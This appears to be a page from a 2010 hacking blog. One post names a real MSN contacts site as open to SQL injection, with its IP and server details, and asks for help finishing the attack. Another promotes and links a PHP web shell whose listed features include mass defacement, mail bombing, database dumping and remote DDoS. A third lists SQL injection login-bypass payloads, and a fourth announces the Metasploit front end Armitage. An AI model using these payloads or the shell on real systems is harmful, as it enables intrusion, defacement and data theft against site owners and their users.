
contactos.es.msn.com Vulnerable to SQL Injection

Vulnerable, but I don't know how to finish completing the SQL injection
http://contactos.es.msn.com/help/contact_ex_v.php?type=1

Target:         http://contactos.es.msn.com/help/contact_ex_v.php?type=1
Host IP:        212.73.212.124
Web Server:     Zeus/4_3
DB Server:     PostgreSQL

Monday, 29 November 2010 | 3 comments

Undetectable shell

This shell is developed by ITSecTeam members and it can:

  • execute system commands
  • execute bypass command
  • bypass directory
  • connect to common databases like MsSQL, MsSQL, PostgreSQL, Oracle & DB2
  • edit files & directories
and new version features:
  • Adding server information, php version and safe mode to the top of the shell page for ease of use.
  • System drives listing.
  • Adding icons to files and folders.
  • Opening files with direct link.
  • Downloading all of the files and folders of a special folder in zip format without using a specific function.
  • Direct downloading a file.
  • Maintaining working directory to use of whole site features.
  • Adding symlink in 2 ways: using os command line and php abilities.
  • Changing string to other formats.
  • Mail Bomber.
  • Local Crashing of php and apache.
  • Dumping database into sql and gzip format.
  • Mass defacing of all folders with write access permission.
  • Downloading a file from other servers.
  • Performing remote DDoS attack.
  • Searching for all writable folders.
  • Bypass symlink and Mod security via htaccess and disabling safe mode and disable functions via php.ini if the server is unsuitably configured.
  • Removing shell automatically.
  • Copying a file without using copy function.
  • Changing of shell template.
  • Removing bugs of former versions.
  • Adding event of last activities.
  • Disabling magic quote in runtime.
  • and so much more...

http://itsecteam.com/files/itsecteam_shell_2.1.rar

Sunday, 28 November 2010 | 2 comments

Injection

asp aspx
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11:   1 or '1'='1'=1
12:   1 or '1'='1' or 1=1
13:   'OR 1=1
14:   "or 1=1
15: 'xor 
16:   Username   ' UNION Select 1,1,1 FROM admin Where ''='     (admin)
    1




PHP
'or 1=1/*



jsp
1'or'1'='1

Armitage v11.25.10


Armitage - Cyber Attack Management for Metasploit
Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don't use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Changelog:
- start msf button now kills msfrpcd session if db_connect fails
- set default database options to mysql with BackTrack 4 R2 settings.
- Armitage -> Exit menu now kills msfrpcd, if the "Start MSF" button was used
- Added ability to set up a multi/handler from Payload launch dialog

Download and more details: http://www.fastandeasyhacking.com

Video demo: Armitage - Fast and Easy Hacking
